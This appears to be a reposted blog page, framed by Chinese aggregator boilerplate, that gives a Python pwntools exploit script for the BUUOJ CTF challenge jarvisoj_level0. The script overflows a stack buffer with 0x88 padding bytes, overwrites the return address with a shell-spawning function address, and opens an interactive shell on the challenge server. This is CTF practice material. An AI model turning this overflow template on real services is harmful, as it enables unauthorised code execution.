CTF-Buuoj-Pwn-jarvisoj_level0

本文主要是介绍CTF-Buuoj-Pwn-jarvisoj_level0，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

#-----------------------------------------------------------------------------------------------
# coding:UTF-8                                                                                 |
# author:zxcyyyyy000                                                                           |
# :)                                                                                           |
#-----------------------------------------------------------------------------------------------
from PwnContext import *
from pwnlib.util.packing import p32
from pwnlib.util.packing import p64
from pwnlib.util.packing import u32
from pwnlib.util.packing import u64
#-----------------------------------------------------------------------------------------------
s       = lambda data               :ctx.send(str(data))
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))
sl      = lambda data               :ctx.sendline(str(data))
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=False :ctx.recvuntil(delims, drop)
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
uu32    = lambda data               :u32(data.ljust(4, b'\0'))
uu64    = lambda data               :u64(data.ljust(8, b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
irt     = lambda                    :ctx.interactive()
p       = lambda                    :pause()
#-----------------------------------------------------------------------------------------------
Debug                     = 0
file_name                 = 'level0'
target_addr               = 'node4.buuoj.cn:29259'
libc_name                 = ''
libc_path                 = '/home/ubuntu/Tools/libc-database/libs/' + libc_name + '/'
context.log_level         = 'DEBUG'
ctx.binary                = file_name
if Debug == 0:
    elf                   = ELF(file_name)
    if(libc_name != ''):
        libc                  = ELF(libc_path+'libc.so.6')
    context.os            = elf.os
    context.arch          = elf.arch
    ctx.remote=(str((target_addr.split(':'))[0]),int((target_addr.split(':'))[1]))
    ctx.start('remote')
elif Debug == 1:
    ctx.custom_lib_dir    = libc_path
    ctx.debug_remote_libc = True
    elf                   = ELF(file_name)
    libc                  = ELF(libc_path+'libc.so.6')
    context.os            = elf.os
    context.arch          = elf.arch
    ctx.start()
elif Debug == 2:
    elf                   = ELF(file_name)
    ctx.start()
else:
    print("Error")
    exit(1)
#-----------------------------------------------------------------------------------------------
def Exploit():
    sl(0x88*'a'+p64(0x0000000000400596))
    irt()
#-----------------------------------------------------------------------------------------------
Exploit()

这篇关于CTF-Buuoj-Pwn-jarvisoj_level0的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！